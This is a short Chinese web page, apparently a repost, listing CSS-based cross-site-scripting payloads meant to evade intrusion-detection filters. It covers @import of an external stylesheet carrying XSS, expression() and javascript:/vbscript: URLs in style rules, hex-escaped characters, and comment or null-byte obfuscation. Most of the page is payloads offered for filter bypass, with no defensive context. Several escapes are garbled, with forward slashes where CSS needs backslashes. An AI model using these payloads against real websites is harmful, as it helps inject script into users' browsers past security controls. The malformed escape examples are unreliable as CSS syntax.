样式表得 IDS 绕过

来源:互联网 发布:mac bootcamp驱动下载 编辑:程序博客网 时间:2024/06/05 18:06

(1)利用CSS代码@import、e­xpression触发XSS漏洞。
例1:@import "http://hi.baidu.com/jc123/xss.css"; '导入外部带有XSS代码的CSS样式表。
例2:@import'javascript:alert("xss")'; '调用javascript脚本触发漏洞
例3:body{xss:e­xpression(alert('xss'))} '在内部样式表中加入e­xpression事件
例4:<img style="xss:e­xpression(alert("xss"))">'在内嵌样式表中加入e­xpression事件
(2)在CSS代码中加入javascript和vbscript脚本
例1:body{background-image:url(javascript:alert("xss"))}
例2:body{background-image:url(vbscript:msgbox("xss"))}
(3)转换字符类型,以十六进制字符替换其中或全部的字符:
例1:@/0069mport:url(web/1.css);'//将其中的i转为/0069
例2:body{xss:/0065xpression(alert('xss'))}'//将e转换为/0065
例3:body{background-image:/0075/0072/006c...}'将url全转为16进制
(4)插入混淆字符,在css中,/**/是注释字符,除了/**/外,字符"/"和结束符"/0"也是被忽略的,可以用来混淆字符。
例1:@/0im/port'/0ja/vasc/ript:alert("xss")';
例2:@/i/0m/00p/000o/0000/00000r/000000t"url";

 
原创粉丝点击